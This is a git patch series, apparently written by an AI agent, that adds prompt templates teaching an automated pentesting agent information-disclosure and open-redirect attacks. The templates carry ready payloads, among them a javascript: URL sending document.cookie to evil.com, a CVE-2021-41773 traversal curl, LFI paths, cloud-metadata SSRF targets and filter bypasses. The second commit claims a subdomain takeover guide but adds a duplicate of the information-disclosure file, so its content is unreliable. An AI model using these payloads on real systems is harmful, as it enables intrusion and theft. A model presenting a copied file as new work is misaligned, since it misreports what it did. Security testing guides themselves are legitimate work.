From f9a3f7898a1cc5a5bceefdfce5232eb8da52c21c Mon Sep 17 00:00:00 2001 From: Claude Date: Mon, 24 Nov 2025 05:57:57 +0000 Subject: [PATCH 1/2] docs: add information disclosure vulnerability guide Add comprehensive Jinja template covering information leakage testing including error messages, debug modes, git exposure, backup files, config files, API documentation, source maps, and exploitation chains. --- .../information_disclosure.jinja | 229 ++++++++++++++++++ 1 file changed, 229 insertions(+) create mode 100644 strix/prompts/vulnerabilities/information_disclosure.jinja diff --git a/strix/prompts/vulnerabilities/information_disclosure.jinja b/strix/prompts/vulnerabilities/information_disclosure.jinja new file mode 100644 index 000000000..84525add6 --- /dev/null +++ b/strix/prompts/vulnerabilities/information_disclosure.jinja @@ -0,0 +1,229 @@ + +INFORMATION DISCLOSURE + +Information leakage reveals architecture, credentials, and attack surface. Every error, comment, header, and file is intelligence. Defense requires minimizing all unnecessary disclosure. + + +- Verbose errors and stack traces (framework, paths, queries) +- Debug modes and dev environments +- Source control exposure (.git, .svn, .hg) +- Backup/temp files (.bak, ~, .old, .swp) +- Configuration files (.env, web.config, database.yml) +- API documentation (Swagger, GraphQL introspection) +- Comments in source (credentials, TODOs, internal URLs) +- Server headers (versions, technologies) +- Source maps (unminified JS with comments) +- Directory listings +- Metadata in files (EXIF, PDF properties) + + + +1. Provoke errors: invalid inputs, missing params, SQLi chars, type mismatches, boundary values. +2. Enumerate artifacts: .git, backups, configs, source maps. +3. Inspect responses: headers, HTML comments, JSON metadata, error details. +4. Test API docs: Swagger UI, GraphQL introspection, WADL/WSDL. +5. Analyze JS: extract endpoints, secrets, internal URLs. +6. Correlate findings: versions → CVEs, paths → traversal, creds → access. + + + + +- Trigger: SQLi chars (' OR 1=1--), XSS payloads, type confusion, null/empty params +- SQL errors: table/column names, DBMS type/version + Example: "SQLSTATE[42S02]: Table 'users' doesn't exist" → MySQL, table structure +- Stack traces: file paths, function names, library versions, developer emails + Python: /home/app/controllers/UserController.py line 42 + Java: org.springframework.security.access.AccessDeniedException + Node: Error: Cannot read property 'id' of undefined at /app/routes/user.js:15 +- Template injection: ${7*7}, {{7*7}} → reveals engine (Jinja2, Handlebars, etc.) + + + +- Django: DEBUG=True → full error pages, SQL queries, settings, installed apps +- Laravel: APP_DEBUG=true → Whoops error handler with env vars, stack trace +- Rails: development environment → detailed errors, routes, params +- Flask: app.debug=True → Werkzeug interactive debugger (RCE if accessible) +- Express: NODE_ENV=development → verbose errors, stack traces +- ASP.NET: customErrors mode="Off", debug="true" → full stack, view state +- Endpoints: /debug, /_debug, /telescope, /__debug__/, /debug/pprof/ + + + +- Paths: /.git/HEAD, /.git/config, /.git/index, /.git/logs/HEAD +- Tools: git-dumper, GitTools, dvcs-ripper +- Extract: full commit history, credentials in commits, code, developer info +- Check: wget -q /.git/HEAD && echo "Git exposed" +- Also: .svn/entries, .hg/store, .bzr/ + + + +- Patterns: .bak, .old, ~, .swp, .swo, .tmp, .save, .orig +- Examples: config.php.bak, .env.old, web.config~, database.sql, backup.zip +- Editor files: .index.php.swp, #config.php# +- Paths: /backup/, /old/, /bak/, /tmp/, /archive/ +- Database dumps: db.sql, dump.sql, mysql.sql, backup.sql +- Tool: ffuf -w backups.txt -u https://target.com/FUZZ + + + +- .env: DB creds, API keys, JWT secrets, AWS keys +- web.config: connection strings, debug mode, auth settings +- appsettings.json: .NET config, secrets +- database.yml: Rails DB config +- settings.py: Django SECRET_KEY, DATABASES, DEBUG +- config.php: DB creds, encryption keys +- phpinfo.php: full PHP config, versions, paths, env vars +- Dockerfile, docker-compose.yml: build secrets, internal hosts +- .aws/credentials, .ssh/id_rsa: cloud/SSH keys +- package.json, composer.json: dependencies revealing versions + + + +- Swagger/OpenAPI: /swagger, /swagger-ui.html, /api/swagger.json, /api-docs, /v2/api-docs, /openapi.json +- GraphQL introspection: +{% raw %} +query { __schema { types { name fields { name args { name type { name } } } } } } +{% endraw %} +- Reveals: all endpoints, parameters, types, internal routes, authentication requirements +- WADL: /application.wadl (REST) +- WSDL: /?wsdl, /service?wsdl (SOAP) +- Postman: leaked collections with API keys + + + +- Files: app.js.map, main.js.map, bundle.js.map +- Reveals: original source code, comments, internal logic, API endpoints, hardcoded secrets +- Access: check for .map files or SourceMap header +- Extract: original file names, directory structure, developer comments + + + +- HTML: , , +- JavaScript: // FIXME: hardcoded endpoint, /* DB: mysql://user:pass@host */ +- Search: TODO, FIXME, HACK, DEBUG, TEST, admin, password, secret, key, token, api_key + + + + + +Languages/Frameworks: +- Python: Werkzeug, Flask, Django → file paths, module structure +- Ruby: Rails → gem versions, app structure +- Java: Spring, Tomcat → package names, dependency versions +- PHP: Laravel, Symfony → vendor paths, config files +- Node: Express, Nest → package.json dependencies +Extract: paths (/var/www/app/), versions (Django 3.2.5), internal packages (mycompany.auth) + + + +Query reveals entire schema: +- All types, queries, mutations, subscriptions +- Field names, arguments, descriptions +- Disabled? Look for schema in JS bundles or leaked Postman collections +- Field suggestions: typo field name → error suggests valid fields + + + +- Enumerate: find all .js via crawling, view-source, webpack manifests +- Extract: API endpoints, keys, tokens, internal URLs +- Search: apiKey, api_key, API_KEY, secret, token, password, Authorization, Bearer, REACT_APP_, VUE_APP_, NEXT_PUBLIC_ +- Tools: LinkFinder, JSParser, grep with regex +- Webpack bundles: large files contain multiple modules with comments + + + +- Headers: Server (Apache/2.4.41, nginx/1.18.0, IIS/10.0), X-Powered-By (PHP/7.4.3, Express) +- Cookies: PHPSESSID, JSESSIONID, connect.sid, .ASPXAUTH → reveals framework +- Error pages: default 404/500 leak framework/version +- ETags: predictable patterns reveal server software +- Timing: response time patterns reveal caching/backend + + + +- Username enumeration: valid vs invalid user response time differs +- State inference: valid vs invalid token processing time +- Blind SQLi: sleep-based confirmation +- Cache HIT vs MISS: timing reveals cached content + + + +- Misconfigured: Apache Options +Indexes, nginx autoindex on +- Targets: /uploads/, /images/, /files/, /backup/, /logs/, /tmp/, /assets/ +- Reveals: file structure, names, sizes, timestamps +- Test: browse to directory without filename + + + +- EXIF in images: GPS coords, camera model, software, author, timestamps +- PDF: author, creator, software versions, internal paths +- Office docs: author, company, revision history, hidden content +- Tools: exiftool, pdfinfo, strings + + + + + +- .env: DATABASE_URL=postgres://user:pass@host:5432/db, AWS_SECRET_ACCESS_KEY=... +- Git history: git log -p | grep -i password +- Config files: connection strings, SMTP creds, admin passwords +- Source code: hardcoded keys, test accounts +- Tools: gitleaks, truffleHog, detect-secrets + + + +1. Extract version: Server: Apache/2.4.49 +2. Search CVE: CVE-2021-41773 (path traversal) +3. Exploit: curl https://target.com/cgi-bin/.%2e/.%2e/.%2e/etc/passwd +Chain: disclosure → exploitation + + + +1. Error reveals path: /var/www/html/includes/config.php +2. LFI: https://target.com/page.php?file=../../../../var/www/html/includes/config.php +3. Extract credentials from config + + + +1. GraphQL introspection reveals hidden mutations: deleteUser(id: ID!) +2. Test: mutation { deleteUser(id: "123") { success } } +3. IDOR if no authz check + + + + +1. Screenshot/raw response showing disclosure. +2. Explain impact: how it accelerates attacks (version→CVE, creds→access, paths→traversal). +3. Provide examples: extracted secrets, internal structure, API schema. +4. Classify severity: low (versions) to critical (credentials, source code). + + + +- Intentional public docs (public API Swagger) +- Generic errors without details (404, 500 no stack) +- Version info for transparency (debatable) + + + +- git-dumper: python3 git-dumper.py https://target.com/.git/ output/ +- GitTools: ./gitdumper.sh https://target.com/.git/ output/ +- gitleaks: gitleaks detect --source . --verbose +- ffuf: ffuf -w wordlist.txt -u https://target.com/FUZZ -mc 200 +- LinkFinder: python3 linkfinder.py -i https://target.com -o results.html +- exiftool: exiftool image.jpg + + + +1. Check .git first; full source code = jackpot. +2. Provoke errors systematically: SQLi, type confusion, missing params. +3. Inspect all headers; versions everywhere. +4. Enumerate API docs: Swagger, GraphQL introspection. +5. Analyze JS thoroughly: webpack bundles = treasure trove. +6. Search for backups: .bak, ~, .old, .swp. +7. Read comments: developers leave clues. +8. Test directory listings on /uploads/, /files/. +9. Chain findings: version→CVE, path→traversal, creds→access. +10. Automate: continuous monitoring for new disclosures. + + +Information disclosure is rarely standalone critical but enables all other attacks. Every leaked byte narrows attacker search space. Minimize disclosure at every layer. Defense-in-depth requires operational discipline and continuous monitoring. + From 94248b879121474ea1eec70394ddd410d165c1cc Mon Sep 17 00:00:00 2001 From: Claude Date: Mon, 24 Nov 2025 06:01:29 +0000 Subject: [PATCH 2/2] docs: add open redirect and subdomain takeover vulnerability guides Add comprehensive Jinja templates for: - Open redirect: parser differentials, protocol bypasses, OAuth exploitation - Subdomain takeover: information disclosure patterns and techniques --- .../vulnerabilities/open_redirect.jinja | 202 +++++++++++++++ .../vulnerabilities/subdomain_takeover.jinja | 229 ++++++++++++++++++ 2 files changed, 431 insertions(+) create mode 100644 strix/prompts/vulnerabilities/open_redirect.jinja create mode 100644 strix/prompts/vulnerabilities/subdomain_takeover.jinja diff --git a/strix/prompts/vulnerabilities/open_redirect.jinja b/strix/prompts/vulnerabilities/open_redirect.jinja new file mode 100644 index 000000000..7a16e21db --- /dev/null +++ b/strix/prompts/vulnerabilities/open_redirect.jinja @@ -0,0 +1,202 @@ + +OPEN REDIRECT + +Open redirects enable phishing, OAuth token theft, SSRF, and XSS via unvalidated URLs. Validate all redirect targets against strict allowlists (scheme+host+path) before navigation. + + +- URL parameters controlling navigation, flows, or login return states +- OAuth/SSO flows (redirect_uri, returnTo, continue, callback, next) +- Multi-hop redirects where only first hop validated +- Scheme confusion: javascript:, data:, file:, gopher:, blob: + + + +1. Enumerate all redirect mechanisms: login/logout, OAuth, password reset, payment callbacks. +2. Identify params all the redirect params +3. Test universal bypasses: //evil.com, @evil.com, encoding variants. +4. Probe parser differentials: server validation vs browser execution. +5. Prove impact: phishing, token theft, SSRF, XSS execution. + + + +- URL params: redirect, url, next, return_to, continue, goto, target, callback, out, redir +- OAuth/SAML: redirect_uri, post_logout_redirect_uri, state, RelayState +- Headers: Host, X-Forwarded-Host, Referer, Location +- Client: window.location, router.push(), location.href, meta refresh + + + + +https://trusted.com@evil.com - Server sees trusted.com, browser navigates evil.com +Variants: trusted.com%40evil.com, foo%40evil.com%40trusted.com +Success: 80%+ bypass rate + + + +https://trusted.com\evil.com - Windows treats \ as /, navigates evil.com +Variants: \\evil.com, \/evil.com, /\evil.com + + + +trusted.com%09evil.com, %0Aevil.com - Parsers split differently +http%09://evil.com, h%09ttp://evil.com + + + +trusted.com%00.evil.com - C-parsers split, browser continues + + + +trusted.com#@evil.com, %2523evil.com - Validators check before # + + + + + +//evil.com (protocol-relative), ///evil.com, /\evil.com, \/\/evil.com +hTTps://evil.com (case variation) - Bypasses 80% checks + + + +http:evil.com, http:/\evil.com, http:\\evil.com +%00http://evil.com through %1Fhttp://evil.com (control chars) +http%09://evil.com, http%0A://evil.com + + + +javascript:alert(document.domain), javascript:fetch('//evil.com?c='+document.cookie) +java%09script:alert(1), jAvAsCrIpT:alert(1) +data:text/html,, data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== + + + +file:///etc/passwd, http://127.0.0.1, http://[::1], http://169.254.169.254/latest/meta-data/ + + + + +URL: %2f%2fevil.com, %252f%252fevil.com | Hex IP: 0x7f.0x00.0x00.0x01, 0x7F.1 | Octal: 0177.0.0.1 | Decimal: 2130706433 | IPv6: [::1], [::ffff:127.0.0.1] | Unicode: еvil.com (Cyrillic), evil。com | Zero-width: %E2%80%8Bevil.com | CRLF: %0D%0A//evil.com + + + + +trusted.com.evil.com, evil-trusted.com, trusted.com%2Eevil.com + + + +*.trusted.com → sub.evil.com.trusted.com | /trusted\.com/ → evil.trusted.com | contains("trusted") → trusted.com.evil.com | truѕted.com (Cyrillic) + + + +redirect_uri=https://trusted.com/out?url=https://evil.com - Double-hop bypass + + + + + +Prefix: https://trusted.com → https://trusted.com.evil.com +Suffix: /callback → /callback@evil.com +Path traversal: /oauth/../../@evil.com +Wildcard: *.trusted.com → attacker.trusted.com + + + +redirect_uri (primary), post_logout_redirect_uri (less validated), state (CSRF + leak), RelayState (often unvalidated), Implicit flow (fragment leaked) + + + + + +127.0.0.1, [::1], 0.0.0.0, localhost, 127.1, 0 | 169.254.169.254/latest/meta-data/ | 192.168.x.x, 10.x.x.x | Bypass: 127.0.0.1.nip.io, localhost.evil.com + + + +1. Domain resolves to public IP (passes validation) +2. TTL expires, rebinds to internal IP +3. Server follows to internal resource +4. Exfiltrate via timing/errors + + + + + +Rails: redirect_to params[:url] → params[:url][]=//evil.com +Django: HttpResponseRedirect(request.GET['next']) → ?next=//evil.com +PHP: header("Location: ".$_GET['url']) → CRLF vulnerable +Express: res.redirect(req.query.url) → accepts //evil.com +Spring: "redirect:"+param → protocol confusion + + + +Next.js: router.push(query.redirect) | React: navigate(searchParams.get('url')) | Angular: router.navigateByUrl(params.returnUrl) | Vue: router.push(route.query.next) - Universal: //evil.com works all + + + + + +1. Send: https://trusted.com/login?redirect=https://evil.com/fake +2. Victim clicks, completes action +3. Redirects to evil.com cloned page +4. Credentials captured + + + +1. Password reset + Host: evil.com header +2. Backend builds: https://evil.com/reset?token=SECRET +3. Add: &redirect=https://attacker.com +4. Token leaked, account takeover + + + +1. Pre-create session +2. Send: login?redirect=https://evil.com/capture +3. Session data captured + + + + + +CSP allows script-src https://trusted.com +Open redirect: trusted.com/out?url=javascript:alert(1) +CSP trusts domain, JS executes + + + +POST /forgot with Host: evil.com → Backend generates: https://evil.com/reset?token=SECRET +Combine with open redirect for exfiltration + + + +Server renders: +Payload: ?redirect=javascript:alert(1) → XSS + + + + +1. Minimal payload with navigation to evil.com (address bar proof). +2. Demonstrate bypass of validation (allowlist, regex, protocol). +3. Test browsers (Chrome, Firefox, Safari) for consistency. +4. Prove impact: phishing, OAuth token capture, SSRF, XSS. + + + +- Exact URL allowlist (full scheme+host+path) +- Relative paths only (no protocol/domain) +- WHATWG URL API strict validation +- User confirmation dialog +- OAuth exact match pre-registration + + + +1. Protocol-relative (//evil.com) bypasses naive checks +2. @evil.com for parser differentials. +3. Test redirect_uri AND post_logout_redirect_uri separately. +4. Chain with Host header injection for password reset. +5. javascript:/data: for XSS when redirect domain in CSP. +6. 127.0.0.1, 169.254.169.254 for SSRF. +7. Double-hop via trusted domain bypasses strict validation. +8. Test in real browsers; parser differences critical. + + +Parser differentials are primary weapon. Protocol-relative bypasses most checks. OAuth redirect_uri highest-value target. Chain: redirect → token theft → takeover. Test javascript:/data: for XSS. Document with address bar navigation proof. + diff --git a/strix/prompts/vulnerabilities/subdomain_takeover.jinja b/strix/prompts/vulnerabilities/subdomain_takeover.jinja new file mode 100644 index 000000000..84525add6 --- /dev/null +++ b/strix/prompts/vulnerabilities/subdomain_takeover.jinja @@ -0,0 +1,229 @@ + +INFORMATION DISCLOSURE + +Information leakage reveals architecture, credentials, and attack surface. Every error, comment, header, and file is intelligence. Defense requires minimizing all unnecessary disclosure. + + +- Verbose errors and stack traces (framework, paths, queries) +- Debug modes and dev environments +- Source control exposure (.git, .svn, .hg) +- Backup/temp files (.bak, ~, .old, .swp) +- Configuration files (.env, web.config, database.yml) +- API documentation (Swagger, GraphQL introspection) +- Comments in source (credentials, TODOs, internal URLs) +- Server headers (versions, technologies) +- Source maps (unminified JS with comments) +- Directory listings +- Metadata in files (EXIF, PDF properties) + + + +1. Provoke errors: invalid inputs, missing params, SQLi chars, type mismatches, boundary values. +2. Enumerate artifacts: .git, backups, configs, source maps. +3. Inspect responses: headers, HTML comments, JSON metadata, error details. +4. Test API docs: Swagger UI, GraphQL introspection, WADL/WSDL. +5. Analyze JS: extract endpoints, secrets, internal URLs. +6. Correlate findings: versions → CVEs, paths → traversal, creds → access. + + + + +- Trigger: SQLi chars (' OR 1=1--), XSS payloads, type confusion, null/empty params +- SQL errors: table/column names, DBMS type/version + Example: "SQLSTATE[42S02]: Table 'users' doesn't exist" → MySQL, table structure +- Stack traces: file paths, function names, library versions, developer emails + Python: /home/app/controllers/UserController.py line 42 + Java: org.springframework.security.access.AccessDeniedException + Node: Error: Cannot read property 'id' of undefined at /app/routes/user.js:15 +- Template injection: ${7*7}, {{7*7}} → reveals engine (Jinja2, Handlebars, etc.) + + + +- Django: DEBUG=True → full error pages, SQL queries, settings, installed apps +- Laravel: APP_DEBUG=true → Whoops error handler with env vars, stack trace +- Rails: development environment → detailed errors, routes, params +- Flask: app.debug=True → Werkzeug interactive debugger (RCE if accessible) +- Express: NODE_ENV=development → verbose errors, stack traces +- ASP.NET: customErrors mode="Off", debug="true" → full stack, view state +- Endpoints: /debug, /_debug, /telescope, /__debug__/, /debug/pprof/ + + + +- Paths: /.git/HEAD, /.git/config, /.git/index, /.git/logs/HEAD +- Tools: git-dumper, GitTools, dvcs-ripper +- Extract: full commit history, credentials in commits, code, developer info +- Check: wget -q /.git/HEAD && echo "Git exposed" +- Also: .svn/entries, .hg/store, .bzr/ + + + +- Patterns: .bak, .old, ~, .swp, .swo, .tmp, .save, .orig +- Examples: config.php.bak, .env.old, web.config~, database.sql, backup.zip +- Editor files: .index.php.swp, #config.php# +- Paths: /backup/, /old/, /bak/, /tmp/, /archive/ +- Database dumps: db.sql, dump.sql, mysql.sql, backup.sql +- Tool: ffuf -w backups.txt -u https://target.com/FUZZ + + + +- .env: DB creds, API keys, JWT secrets, AWS keys +- web.config: connection strings, debug mode, auth settings +- appsettings.json: .NET config, secrets +- database.yml: Rails DB config +- settings.py: Django SECRET_KEY, DATABASES, DEBUG +- config.php: DB creds, encryption keys +- phpinfo.php: full PHP config, versions, paths, env vars +- Dockerfile, docker-compose.yml: build secrets, internal hosts +- .aws/credentials, .ssh/id_rsa: cloud/SSH keys +- package.json, composer.json: dependencies revealing versions + + + +- Swagger/OpenAPI: /swagger, /swagger-ui.html, /api/swagger.json, /api-docs, /v2/api-docs, /openapi.json +- GraphQL introspection: +{% raw %} +query { __schema { types { name fields { name args { name type { name } } } } } } +{% endraw %} +- Reveals: all endpoints, parameters, types, internal routes, authentication requirements +- WADL: /application.wadl (REST) +- WSDL: /?wsdl, /service?wsdl (SOAP) +- Postman: leaked collections with API keys + + + +- Files: app.js.map, main.js.map, bundle.js.map +- Reveals: original source code, comments, internal logic, API endpoints, hardcoded secrets +- Access: check for .map files or SourceMap header +- Extract: original file names, directory structure, developer comments + + + +- HTML: , , +- JavaScript: // FIXME: hardcoded endpoint, /* DB: mysql://user:pass@host */ +- Search: TODO, FIXME, HACK, DEBUG, TEST, admin, password, secret, key, token, api_key + + + + + +Languages/Frameworks: +- Python: Werkzeug, Flask, Django → file paths, module structure +- Ruby: Rails → gem versions, app structure +- Java: Spring, Tomcat → package names, dependency versions +- PHP: Laravel, Symfony → vendor paths, config files +- Node: Express, Nest → package.json dependencies +Extract: paths (/var/www/app/), versions (Django 3.2.5), internal packages (mycompany.auth) + + + +Query reveals entire schema: +- All types, queries, mutations, subscriptions +- Field names, arguments, descriptions +- Disabled? Look for schema in JS bundles or leaked Postman collections +- Field suggestions: typo field name → error suggests valid fields + + + +- Enumerate: find all .js via crawling, view-source, webpack manifests +- Extract: API endpoints, keys, tokens, internal URLs +- Search: apiKey, api_key, API_KEY, secret, token, password, Authorization, Bearer, REACT_APP_, VUE_APP_, NEXT_PUBLIC_ +- Tools: LinkFinder, JSParser, grep with regex +- Webpack bundles: large files contain multiple modules with comments + + + +- Headers: Server (Apache/2.4.41, nginx/1.18.0, IIS/10.0), X-Powered-By (PHP/7.4.3, Express) +- Cookies: PHPSESSID, JSESSIONID, connect.sid, .ASPXAUTH → reveals framework +- Error pages: default 404/500 leak framework/version +- ETags: predictable patterns reveal server software +- Timing: response time patterns reveal caching/backend + + + +- Username enumeration: valid vs invalid user response time differs +- State inference: valid vs invalid token processing time +- Blind SQLi: sleep-based confirmation +- Cache HIT vs MISS: timing reveals cached content + + + +- Misconfigured: Apache Options +Indexes, nginx autoindex on +- Targets: /uploads/, /images/, /files/, /backup/, /logs/, /tmp/, /assets/ +- Reveals: file structure, names, sizes, timestamps +- Test: browse to directory without filename + + + +- EXIF in images: GPS coords, camera model, software, author, timestamps +- PDF: author, creator, software versions, internal paths +- Office docs: author, company, revision history, hidden content +- Tools: exiftool, pdfinfo, strings + + + + + +- .env: DATABASE_URL=postgres://user:pass@host:5432/db, AWS_SECRET_ACCESS_KEY=... +- Git history: git log -p | grep -i password +- Config files: connection strings, SMTP creds, admin passwords +- Source code: hardcoded keys, test accounts +- Tools: gitleaks, truffleHog, detect-secrets + + + +1. Extract version: Server: Apache/2.4.49 +2. Search CVE: CVE-2021-41773 (path traversal) +3. Exploit: curl https://target.com/cgi-bin/.%2e/.%2e/.%2e/etc/passwd +Chain: disclosure → exploitation + + + +1. Error reveals path: /var/www/html/includes/config.php +2. LFI: https://target.com/page.php?file=../../../../var/www/html/includes/config.php +3. Extract credentials from config + + + +1. GraphQL introspection reveals hidden mutations: deleteUser(id: ID!) +2. Test: mutation { deleteUser(id: "123") { success } } +3. IDOR if no authz check + + + + +1. Screenshot/raw response showing disclosure. +2. Explain impact: how it accelerates attacks (version→CVE, creds→access, paths→traversal). +3. Provide examples: extracted secrets, internal structure, API schema. +4. Classify severity: low (versions) to critical (credentials, source code). + + + +- Intentional public docs (public API Swagger) +- Generic errors without details (404, 500 no stack) +- Version info for transparency (debatable) + + + +- git-dumper: python3 git-dumper.py https://target.com/.git/ output/ +- GitTools: ./gitdumper.sh https://target.com/.git/ output/ +- gitleaks: gitleaks detect --source . --verbose +- ffuf: ffuf -w wordlist.txt -u https://target.com/FUZZ -mc 200 +- LinkFinder: python3 linkfinder.py -i https://target.com -o results.html +- exiftool: exiftool image.jpg + + + +1. Check .git first; full source code = jackpot. +2. Provoke errors systematically: SQLi, type confusion, missing params. +3. Inspect all headers; versions everywhere. +4. Enumerate API docs: Swagger, GraphQL introspection. +5. Analyze JS thoroughly: webpack bundles = treasure trove. +6. Search for backups: .bak, ~, .old, .swp. +7. Read comments: developers leave clues. +8. Test directory listings on /uploads/, /files/. +9. Chain findings: version→CVE, path→traversal, creds→access. +10. Automate: continuous monitoring for new disclosures. + + +Information disclosure is rarely standalone critical but enables all other attacks. Every leaked byte narrows attacker search space. Minimize disclosure at every layer. Defense-in-depth requires operational discipline and continuous monitoring. +